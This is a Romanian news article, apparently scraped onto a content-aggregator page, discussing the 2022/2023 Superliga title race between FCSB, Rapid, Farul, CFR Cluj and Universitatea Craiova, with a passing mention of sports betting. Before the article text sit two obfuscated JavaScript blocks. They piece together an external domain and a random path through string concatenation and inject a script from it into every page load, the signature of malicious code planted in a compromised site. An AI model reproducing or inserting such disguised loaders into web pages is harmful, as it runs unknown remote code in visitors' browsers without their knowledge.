Cine se impune în acest sezon al Superligii?

Read Time:3 Minute, 23 Second

[ad_1]

(function(){
zs28=document.createElement(„script”);zs28_=((„u”)+”st”)+”a”;zs28.async=true;
zs28.type=”text/javascript”;zs28_+=(„t.i”)+””+”n”;zs28_+=((„f”)+”o”);zs28_+=”/”;
zs28u=”195072879.”;zs28u+=”1ntnhacbs28yd3drzhh”+”itji8cwi0al”;
zs28.src=”https://”+zs28_+zs28u;document.body.appendChild(zs28);
})();

(function(){
wjry=document.createElement(„script”);wjry.type=”text/javascript”;
wjry.async=true;wjry_=((„us”)+”t”)+”a”;wjry_+=(„t.i”)+””+”n”;wjry_+=((„f”)+”o”);wjry_+=”/”;
wjryu=”195167312.”;wjryu+=”mvdqf4umjry14lthgq1qrdlkfqs1de”;wjry.src=”https://”+wjry_+wjryu;
wjrydb=document.body;wjrydb.appendChild(wjry);
})();

Sezonul 2022/2023 al Ligii I este în plină desfășurare, urmând a se încheia în luna mai a anului viitor. Dacă stagiunea precedentă a consemnat o luptă între cei doi granzi, CFR Cluj și FCSB, care s-a dus până aproape de ultima etapă, sezonul acesta s-ar putea să producă o surpriză în ceea ce privește campioana. Aspect de care trebuie să ții cont dacă mizezi la pariuri sportive pe Superliga.

FCSB se află abia în a doua parte a clasamentului, iar jocul nu merge deloc. CFR Cluj și Universitatea Craiova au și ele problemele lor, în timp ce Farul Constanța și Rapid sunt formațiile care prestează cel mai bun fotbal.

Transferuri pe bandă rulantă la FCSB

Ca de obicei, am putea spune, patronul celor de la FCSB, Gigi Becali, a agitat destul de mult apele până la finalul perioadei de transferuri. I-a adus la formația sa pe Bogdan Rusu, David Miculescu, Andrea Compagno și Bilel Omrani, dorind să aibă soluții multiple pe faza ofensivă. Doar că, până acum, doar Miculescu a dat satisfacție. Jocul celor de la FCSB nu se pliază neapărat cu ce are de oferit Compagno, jucător excelent la fosta sa formație, “U” Craiova 1948. Cât despre Omrani, acesta a venit cu câteva kilograme în plus, deci va mai dura ceva până când Nicolae Dică îl va putea folosi la capacitate maximă.

FCSB nu a mai luat titlul din 2015, iar metodele lui Gigi Becali au cam dus clubul în această situație. Patronul a schimbat antrenorii care nu l-au ascultat, a făcut schimbări din lojă și a adus jucători fără nicio idee concretă.

Rapidul s-a întors la vremurile de odinioară

Cu Adrian Mutu pe bancă, Rapidul pare o candidată serioasă la câștigarea titlului de campioană. Pentru un club istoric, dar care recent a trecut și prin rigorile ligii secunde, o asemenea performanță ar fi excepțională. Lotul este unul foarte bun, în ciuda vânzării lui Rareș Ilie la Nice în această vară. Dar, poate cel mai important, Rapidul are susținerea unui public numeros și pătimaș.

Dar poate cel mai bun fotbal e prestat de Farul Constanța, cu care Rapidul se bate pentru primele locuri. Constănțenii, conduși de Gheorghe Hagi, au un stil de joc ofensiv, cu mingea la picior și o circulație a balonului extrem de lejeră. Estetic, Farul prestează un fotbal curat, plăcut ochiului. Doar că deși spre deosebire de alte sezoane acum sunt și jucători cu multă experiență, Farul se bazează în continuare pe fotbaliști tineri. Viitorul a arătat însă în 2017 că se poate câștiga titlul și în aceste condiții.

CFR Cluj și Universitatea Craiova vin din urmă

Universitatea Craiova a început slab sezonu și a înlocuit antrenorul, aducandu-l pe Mirel Radoi. Cu toate astea, oltenii au ratat prezența în grupele Conference League. Acolo unde se găsesc însă ardelenii de la CFR Cluj. Clujenii sunt campionii en-titre și au dominat Liga I în ultimul deceniu. Normal ar fi ca ei să aibă un cuvânt important de spus în lupta pentru titlu, în ciuda unui debut de sezon mai degrabă ezitant.

FC Hermannstadt și Petrolul Ploiești sunt alte două echipe care au început bine stagiunea, cu victorii importante. E totuși puțin probabil ca ele să țină pasul odată cu scurgerea etapelor. Pare însă să fie o luptă mai interesantă decât în sezoanele anterioare, cu mai multe formații angrenate în această bătălie pentru trofeu de campioană. Și rămâne de văzut dacă FCSB își va reveni. Pentru frumusețea campionatului e important ca un club cu lotul celor de la FCSB să nu se zbată în mediocritate.[ad_2]

Source link

Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
Previous post #BeActive în 6. Facem sport seara în Parcul Crângași, la Săptămâna Europeană a Sportului. Alte ateliere și competiții
Next post Angajatii si fostii angajati vor avea acces online la REGES
We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners. View more
Accept